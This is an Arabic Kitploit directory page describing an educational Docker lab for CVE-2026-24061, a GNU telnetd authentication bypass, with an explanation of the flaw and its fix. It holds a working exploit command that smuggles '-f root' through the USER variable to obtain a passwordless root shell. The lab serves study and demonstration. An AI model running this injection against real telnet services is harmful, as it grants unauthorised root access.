Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061_Lab — # مختبر Docker تعليمي يوضح CVE-2026-24061، وهو تجاوز للمصادقة في GNU telnetd يسمح بالوصول كجذر عبر حقن الوسائط في متغير البيئة USER. | Kitploit
أدوات/GitHubGitHub/gabs-hub/cve-2026-24061_lab
تحليل الثغرات الأمنيةالاستغلالالمصادقةالتعلم والتعليممختبرات وتدريب عملي
GitHubgabs-hub/cve-2026-24061_lab

CVE-2026-24061_Lab

# مختبر Docker تعليمي يوضح CVE-2026-24061، وهو تجاوز للمصادقة في GNU telnetd يسمح بالوصول كجذر عبر حقن الوسائط في متغير البيئة USER.

عرض المستودع
2منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر CVE-2026-24061 Telnetd

يحتوي هذا المستودع على مختبر بسيط باستخدام Docker لتوضيح الثغرة الأمنية CVE-2026-24061. تسمح هذه الثغرة بتجاوز المصادقة والوصول كجذر (root) في GNU telnetd على نظام لينكس.

الهدف تعليمي بحت.

المتطلبات

  • تثبيت Docker
  • تثبيت عميل Telnet

بناء الصورة

root@kitploit:~
docker build -t cve-2026-24061 .

تشغيل الحاوية

root@kitploit:~
docker run -it -p 2323:23 cve-2026-24061

الاستغلال

في طرفية أخرى، نفّذ:

root@kitploit:~
USER="-f root" telnet -a localhost 2323

بعد ذلك، سيتم منح الوصول مباشرة كجذر (root)، دون طلب كلمة مرور.

ملاحظات

  • تستخدم الحاوية إصدارًا ضعيفًا من GNU inetutils telnetd
  • لا ينبغي تعريض خدمة Telnet في البيئات الحقيقية
  • استخدم هذا المختبر للدراسة والعرض التوضيحي فقط

كيف تعمل الثغرة؟

يحدث الخلل بسبب حقن وسائط (arguments) أثناء استدعاء الأداة /usr/bin/login. يقوم telnetd ببناء سطر الأوامر المستخدم لاستدعاء login ديناميكيًا ويتضمن قيمة متغير البيئة USER عبر العنصر النائب %U، دون أي تنقية (sanitization).

وبما أن أداة login تقبل الخيار -f، الذي يتجاهل مصادقة كلمة المرور، يمكن للمهاجم تعيين USER="-f root" وإجبار تسجيل الدخول المباشر كجذر.

ونظرًا لأن telnetd يعمل بصلاحيات مرتفعة، فإن هذا التلاعب يؤدي فورًا إلى شل جذر (root shell) دون الحاجة إلى بيانات اعتماد صالحة. الاستغلال بسيط، ولا يتطلب أي تفاعل مسبق، ويمكن أتمتته بسهولة، مما يبرر درجة CVSS 9.8.

تم إصلاح الثغرة من خلال إدخال التحقق والتنقية لمتغير USER، وحظر القيم التي تبدأ بشرطة والأحرف الخاصة، مما يمنع حقن الوسائط في login.

تنزيل الأداة